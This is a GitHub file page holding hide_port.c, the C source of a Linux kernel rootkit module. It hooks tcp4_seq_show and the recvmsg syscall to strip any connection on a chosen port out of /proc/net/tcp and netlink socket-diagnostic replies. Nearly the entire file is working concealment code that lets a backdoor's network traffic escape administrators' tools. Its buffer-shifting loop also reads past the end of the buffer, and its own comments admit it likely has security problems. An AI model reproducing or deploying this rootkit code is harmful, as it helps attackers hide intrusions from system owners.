This repository was archived by the owner on Dec 20, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathhide_port.c
156 lines (127 loc) · 4.49 KB
/
hide_port.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
//
// Created by sciver on 10/19/22.
//
#include "hide_port.h"
// #include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
// #include <linux/kallsyms.h>
#include <linux/tcp.h>
asmlinkage ssize_t (*real_sys_recvmsg)(const struct pt_regs *regs);
/* Function declaration for the original tcp4_seq_show() function that we
* are going to hook.
* */
asmlinkage long (*orig_tcp4_seq_show)(struct seq_file *seq, void *v);
/* This is our hook function for tcp4_seq_show */
asmlinkage long fake_tcp4_seq_show(struct seq_file *seq, void *v)
{
struct inet_sock *sock_info;
long ret;
unsigned short port = htons(PORT_TO_BE_HIDE);
if (v != SEQ_START_TOKEN)
{
sock_info = (struct inet_sock *)v;
if (port == sock_info->inet_sport || port == sock_info->inet_dport)
{
printk(KERN_DEBUG "rootkit: detected tcp4_seq_show: sport: %d, dport: %d\n",
ntohs(sock_info->inet_sport), ntohs(sock_info->inet_dport));
return 0;
}
}
ret = orig_tcp4_seq_show(seq, v);
return ret;
}
/* Function that checks whether specified netlink message contains data to be masked */
static bool data_should_be_masked(struct nlmsghdr *nlh)
{
struct inet_diag_msg *r;
// int port;
// struct port_node *node = NULL;
/* NLMSG_DATA: Given a netlink header structure, this macro returns
a pointer to the ancilliary data which it contains */
r = NLMSG_DATA(nlh);
// 未判断协议类型
if (ntohs(r->id.idiag_sport) == PORT_TO_BE_HIDE || ntohs(r->id.idiag_dport) == PORT_TO_BE_HIDE)
{
printk(KERN_DEBUG "rootkit: detected recvmsg: sport: %d dport:%d\n",
ntohs(r->id.idiag_sport),ntohs(r->id.idiag_dport));
return true;
}
return false;
}
ssize_t fake_sys_recvmsg(const struct pt_regs *regs)
{
// int sockfd, struct user_msghdr __user *msg, unsigned flags
long ret;
struct nlmsghdr *nlh, *nlh_kernel;
void *nlh_user_ptr;
long count;
char *stream;
int offset;
int i;
struct user_msghdr msg;
struct iovec *msg_iov;
/* Call original `recvmsg` syscall */
ret = real_sys_recvmsg(regs);
/* Some error occured. Don't do anything. */
if (ret <= 0)
return ret;
/* Extract netlink message header from message */
// nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base);
if (copy_from_user(&msg, (void *)regs->si, sizeof(struct user_msghdr)))
{
printk(KERN_INFO "rootkit: copy_from_user fail. si");
return ret;
}
msg_iov = msg.msg_iov;
if (copy_from_user(&nlh_user_ptr, &msg_iov->iov_base, sizeof(void *)))
{
printk(KERN_INFO "rootkit: copy_from_user fail. iov_base");
return ret;
}
nlh_kernel = (struct nlmsghdr *)kmalloc(ret, GFP_KERNEL);
if (copy_from_user(nlh_kernel, nlh_user_ptr, ret))
{
printk(KERN_INFO "rootkit: copy_from_user fail. nlh_user_ptr");
kfree(nlh_kernel);
return ret;
}
nlh = nlh_kernel;
/* Number of bytes remaining in message stream */
count = ret;
// 下面的代码很可能有安全问题
/* NLMSG_OK: This macro will return true if a netlink message was received. It
essentially checks whether it's safe to parse the netlink message (if indeed
is a netlink message) using the other NLMSG_* macros. */
while (NLMSG_OK(nlh, count))
{
if (!data_should_be_masked(nlh))
{
/* NLMSG_NEXT: Many netlink protocols have request messages that result
in multiple response messages. In these cases, multiple responses will
be copied into the `msg` buffer. This macro can be used to walk the
chain of responses. Returns NULL in the event the message is the last
in the chain for the given buffer. */
nlh = NLMSG_NEXT(nlh, count);
continue;
}
stream = (char *)nlh;
/* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it
up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */
offset = NLMSG_ALIGN((nlh)->nlmsg_len);
/* Copy remaining entries over the data to be masked */
for (i = 0; i < count; i++)
{
stream[i] = stream[i + offset];
}
/* Adjust the data length */
ret -= offset;
}
if (copy_to_user_mcsafe(nlh_user_ptr, nlh_kernel, ret))
{
printk(KERN_INFO "rootkit: copy_to_user_mcsafe fail.");
}
kfree(nlh_kernel);
return ret;
}